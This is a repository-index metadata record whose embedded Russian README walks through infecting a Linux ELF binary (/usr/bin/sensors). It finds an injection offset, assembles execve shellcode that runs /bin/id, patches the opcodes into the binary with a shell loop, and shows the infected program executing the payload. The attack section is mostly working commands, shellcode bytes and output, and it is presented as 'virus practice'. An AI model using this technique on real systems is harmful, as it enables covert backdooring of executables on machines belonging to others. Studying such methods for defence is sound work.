{"id":27021333,"url":"https://github.com/oditynet/virus-practice","last_synced_at":"2025-07-22T10:03:33.391Z","repository":{"id":279984839,"uuid":"940645854","full_name":"oditynet/virus-practice","owner":"oditynet","description":"Опишу практику заражения файлов elf в linux","archived":false,"fork":false,"pushed_at":"2025-02-28T15:14:36.000Z","size":24,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-04-04T19:51:19.315Z","etag":null,"topics":["tutorial-sourcecode","virus"],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/oditynet.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2025-02-28T14:43:49.000Z","updated_at":"2025-03-19T16:05:45.000Z","dependencies_parsed_at":"2025-03-01T10:31:35.974Z","dependency_job_id":null,"html_url":"https://github.com/oditynet/virus-practice","commit_stats":null,"previous_names":["oditynet/virus-practice"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/oditynet/virus-practice","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/oditynet%2Fvirus-practice","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/oditynet%2Fvirus-practice/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/oditynet%2Fvirus-practice/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/oditynet%2Fvirus-practice/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/oditynet","download_url":"https://codeload.github.com/oditynet/virus-practice/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/oditynet%2Fvirus-practice/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":266472705,"owners_count":23934468,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-07-22T02:00:09.085Z","response_time":66,"last_error":null,"robots_txt_status":null,"robots_txt_updated_at":null,"robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["tutorial-sourcecode","virus"],"created_at":"2025-04-04T19:50:02.087Z","updated_at":"2025-07-22T10:03:33.343Z","avatar_url":"https://github.com/oditynet.png","language":"C","funding_links":[],"categories":[],"sub_categories":[],"readme":"# virus-practice\nОпишу практику заражения файлов elf в linux\nНаш подопытный: /usr/bin/sensors\n\nДля начала нам нужно убедиться, что программа не скомпилирована с бит защиты -fPIC. Для этого ищим в headers поля .got.plt (мы же не хотим исполнить команду в области памяти и получить segmentation fault):\n````\nreadelf -a sensors|grep \".got.plt\"\n  [22] .got.plt          PROGBITS         0000000000006fe8  00006fe8\n   05     .init_array .fini_array .data.rel.ro .dynamic .got .got.plt .data .bss \n   12     .init_array .fini_array .data.rel.ro .dynamic .got .got.plt \n````\n00006fe8 - очень хорошо. Сразу узнаем смещение для инъекции\n```\nr2 -A /usr/bin/sensors\nafl\n0x000027f0    5     55 entry.fini0\nq\nobjdump -d /usr/bin/sensors|grep -A2 \"27f0\"\n    27f0:\tf3 0f 1e fa          \tendbr64\n    27f4:\t80 3d a5 48 00 00 00 \tcmpb   $0x0,0x48a5(%rip)        # 0x70a0\n    27fb:\t75 33                \tjne    0x2830\n```\nСмещение удачное у нас будет в a=0x000027f4 (запомнили)\n\nВыбираем что будем инъектить. У меня будет выполнение команды /bin/id\n\nВот вам скрипт для перевода в hex\n```\n odity@viva  ~/bin/elf  cat rev.py          \ndef rev_str(s):\n    return s[:: - 1]\ns = '/bin/id'\ns= rev_str(s)\nfor i in s:\n    t=hex(ord(i))\n    print(t[2:])\n\n```\nВыполянем его и получаем ...\n```\n✘ odity@viva  ~/bin/elf  python rev.py|tr -d '\\n'\n64692f6e69622f%      \n```\nПочемуем строку в syscall-id.asm  и собраем его.  Вообще это лишнее,чтоб вам было понятнее что куда брать. Собрали, потом из исполняемого файла syscall-id получаем opcode команд наших:\n```\nobjdump -d syscall-id\nизассемблирование раздела .text:\n\n0000000000401000 \u003c.text\u003e:\n  401000:\t48 31 d2             \txor    %rdx,%rdx\n  401003:\t52                   \tpush   %rdx\n  401004:\t48 b8 2f 62 69 6e 2f \tmovabs $0x64692f6e69622f,%rax\n  40100b:\t69 64 00 \n  40100e:\t50                   \tpush   %rax\n  40100f:\t48 89 e7             \tmov    %rsp,%rdi\n  401012:\t52                   \tpush   %rdx\n  401013:\t57                   \tpush   %rdi\n  401014:\t48 89 e6             \tmov    %rsp,%rsi\n  401017:\t48 31 c0             \txor    %rax,%rax\n  40101a:\tb0 3b                \tmov    $0x3b,%al\n  40101c:\t0f 05                \tsyscall\n```\n\nВот начиная от 48 до 05 выписываем  opcode  и через мою утилиту hexedit генерируем инъекцию.... (последним будет opcode с3)\n\n```\na=0x000027f4;for i in $(echo \"48 31 d2 52 48 b8 2f 62 69 6e 2f 69 64 00 50 48 89 e7 52 57 48 89 e6 48 31 c0 b0 3b 0f 05 c3\"); do printf \"./hexedit sensors 0x0000%X 0x%02X\\n\" $(($a)) \"0x\"$i; a=0x0000$(([##16] $a+0x1));done\n```\nСмещение 0x000027f4 узнали ранее. Выполняем скрипт и потом уже сам файл и...\n\n```\n odity@viva  ~/bin/elf  ./sensors \ncoretemp-isa-0000\nAdapter: ISA adapter\nPackage id 0:  +22.0°C  (high = +84.0°C, crit = +100.0°C)\nCore 0:        +19.0°C  (high = +84.0°C, crit = +100.0°C)\nCore 1:        +21.0°C  (high = +84.0°C, crit = +100.0°C)\nCore 2:        +19.0°C  (high = +84.0°C, crit = +100.0°C)\nCore 3:        +19.0°C  (high = +84.0°C, crit = +100.0°C)\n\nacpitz-acpi-0\nAdapter: ACPI interface\ntemp1:        +27.8°C  \ntemp2:        +29.8°C  \n\nuid=1000(odity) gid=1000(odity) groups=1000(odity),958(libvirt-qemu),959(libvirt),992(kvm),998(wheel)\n```\n# PROFIT\n\nСравниваем исходный файл с крякнутым.\n\n```\n640,642c640,642\n\u003c 000027f0: f30f 1efa 4831 d252 48b8 2f62 696e 2f69  ....H1.RH./bin/i\n\u003c 00002800: 6400 5048 89e7 5257 4889 e648 31c0 b03b  d.PH..RWH..H1..;\n\u003c 00002810: 0f05 c315 a047 0000 e863 ffff ffc6 057c  .....G...c.....|\n---\n\u003e 000027f0: f30f 1efa 803d a548 0000 0075 3355 4883  .....=.H...u3UH.\n\u003e 00002800: 3db2 4700 0000 4889 e574 0d48 8b3d f647  =.G...H..t.H.=.G\n\u003e 00002810: 0000 ff15 a047 0000 e863 ffff ffc6 057c  .....G...c.....|\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Foditynet%2Fvirus-practice","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Foditynet%2Fvirus-practice","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Foditynet%2Fvirus-practice/lists"}